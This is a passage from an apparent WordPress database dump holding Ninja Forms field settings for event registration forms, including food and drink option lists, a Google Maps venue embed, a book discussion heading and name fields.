dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Vegitarian\";s:5:\"value\";s:10:\"vegetarian\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:11:\"Gluten Free\";s:5:\"value\";s:9:\"no-gluten\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"None\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}'),(13660,438,'container_class','one-half first','container_class','one-half first'),(13661,438,'element_class','','element_class',''),(13662,438,'admin_label','','admin_label',''),(13663,438,'help_text','','help_text',''),(13664,438,'desc_text','','desc_text',''),(13665,438,'field_label','Any food requirements?','field_label','Any food requirements?'),(13666,438,'field_key','any_food_requirements','field_key','any_food_requirements'),(13667,438,'parent_id','47','parent_id','47'),(13668,439,'objectType','Field','objectType','Field'),(13669,439,'objectDomain','fields','objectDomain','fields'),(13670,439,'editActive','','editActive',''),(13671,439,'order','10','order','10'),(13672,439,'label','Preferred drink?','label','Preferred drink?'),(13673,439,'key','preferred_drink','key','preferred_drink'),(13674,439,'type','listradio','type','listradio'),(13675,439,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13676,439,'label_pos','default','label_pos','default'),(13677,439,'required','1','required','1'),(13678,439,'options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"White wine\";s:5:\"value\";s:10:\"white-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Red wine\";s:5:\"value\";s:8:\"red-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Beer\";s:5:\"value\";s:4:\"beer\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:13:\"No Preference\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}','options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"White wine\";s:5:\"value\";s:10:\"white-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Red wine\";s:5:\"value\";s:8:\"red-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Beer\";s:5:\"value\";s:4:\"beer\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:13:\"No Preference\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}'),(13679,439,'container_class','one-half','container_class','one-half'),(13680,439,'element_class','','element_class',''),(13681,439,'admin_label','','admin_label',''),(13682,439,'help_text','','help_text',''),(13683,439,'desc_text','','desc_text',''),(13684,439,'field_label','Preferred drink?','field_label','Preferred drink?'),(13685,439,'field_key','preferred_drink','field_key','preferred_drink'),(13686,439,'parent_id','47','parent_id','47'),(13687,440,'objectType','Field','objectType','Field'),(13688,440,'objectDomain','fields','objectDomain','fields'),(13689,440,'editActive','','editActive',''),(13690,440,'order','11','order','11'),(13691,440,'label','Divider','label','Divider'),(13692,440,'key','hr_2','key','hr_2'),(13693,440,'type','hr','type','hr'),(13694,440,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13695,440,'container_class','','container_class',''),(13696,440,'element_class','','element_class',''),(13697,440,'field_label','Divider','field_label','Divider'),(13698,440,'field_key','hr_2','field_key','hr_2'),(13699,440,'parent_id','47','parent_id','47'),(13700,441,'objectType','Field','objectType','Field'),(13701,441,'objectDomain','fields','objectDomain','fields'),(13702,441,'editActive','','editActive',''),(13703,441,'order','12','order','12'),(13704,441,'label','HTML','label','HTML'),(13705,441,'key','html','key','html'),(13706,441,'type','html','type','html'),(13707,441,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13708,441,'default','<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>','default','<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>'),(13709,441,'container_class','','container_class',''),(13710,441,'element_class','','element_class',''),(13711,441,'field_label','HTML','field_label','HTML'),(13712,441,'field_key','html','field_key','html'),(13713,441,'drawerDisabled','','drawerDisabled',''),(13714,441,'parent_id','47','parent_id','47'),(13715,442,'objectType','Field','objectType','Field'),(13716,442,'objectDomain','fields','objectDomain','fields'),(13717,442,'editActive','','editActive',''),(13718,442,'order','13','order','13'),(13719,442,'label','Register','label','Register'),(13720,442,'key','register','key','register'),(13721,442,'type','submit','type','submit'),(13722,442,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13723,442,'processing_label','Processing','processing_label','Processing'),(13724,442,'container_class','','container_class',''),(13725,442,'element_class','','element_class',''),(13726,442,'field_label','Register','field_label','Register'),(13727,442,'field_key','register','field_key','register'),(13728,442,'parent_id','47','parent_id','47'),(13729,443,'objectType','Field','objectType','Field'),(13730,443,'objectDomain','fields','objectDomain','fields'),(13731,443,'editActive','','editActive',''),(13732,443,'order','1','order','1'),(13733,443,'idAttribute','id','idAttribute','id'),(13734,443,'label','Book Discussion Registration -Autobiography of a Modern Prophet','label','Book Discussion Registration -Autobiography of a Modern Prophet'),(13735,443,'key','book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063','key','book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063'),(13736,443,'type','html','type','html'),(13737,443,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13738,443,'default','<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','default','<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>'),(13739,443,'container_class','','container_class',''),(13740,443,'element_class','','element_class',''),(13741,443,'field_label','ECK Light and Sound Service Registration','field_label','ECK Light and Sound Service Registration'),(13742,443,'field_key','eck_light_and_sound_service_registration_1620150522553','field_key','eck_light_and_sound_service_registration_1620150522553'),(13743,443,'drawerDisabled','','drawerDisabled',''),(13744,443,'parent_id','44','parent_id','44'),(13745,444,'key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662'),(13746,444,'element_class','','element_class',''),(13747,444,'container_class','','container_class',''),(13748,444,'editActive','','editActive',''),(13749,444,'order','8','order','8'),(13750,444,'idAttribute','id','idAttribute','id'),(13751,444,'label','','label',''),(13752,444,'type','html','type','html'),(13753,444,'default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>'),(13754,444,'drawerDisabled','','drawerDisabled',''),(13755,444,'field_label','','field_label',''),(13756,444,'field_key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','field_key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662'),(13757,445,'objectType','Field','objectType','Field'),(13758,445,'objectDomain','fields','objectDomain','fields'),(13759,445,'editActive','','editActive',''),(13760,445,'order','2','order','2'),(13761,445,'idAttribute','id','idAttribute','id'),(13762,445,'label','Divider','label','Divider'),(13763,445,'key','hr','key','hr'),(13764,445,'type','hr','type','hr'),(13765,445,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13766,445,'container_class','','container_class',''),(13767,445,'element_class','','element_class',''),(13768,445,'field_label','Divider','field_label','Divider'),(13769,445,'field_key','hr','field_key','hr'),(13770,445,'parent_id','44','parent_id','44'),(13771,446,'drawerDisabled','','drawerDisabled',''),(13772,446,'objectType','Field','objectType','Field'),(13773,446,'objectDomain','fields','objectDomain','fields'),(13774,446,'editActive','','editActive',''),(13775,446,'order','3','order','3'),(13776,446,'idAttribute','id','idAttribute','id'),(13777,446,'label','First Name','label','First Name'),(13778,446,'key','firstname','key','firstname'),(13779,446,'type','firstname','type','firstname'),(13780,446,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13781,446,'label_pos','default','label_pos','default'),(13782,446,'required','1','required','1'),(13783,446,'default','','default',''),(13784,446,'placeholder','','placeholder',''),(13785,446,'container_class','','container_class',''),(13786,446,'element_class','','element_class',''),(13787,446,'admin_label','','admin_label',''),(13788,446,'help_text','','help_text',''),(13789,446,'desc_text','','desc_text',''),(13790,446,'field_label','First Name','field_label','First 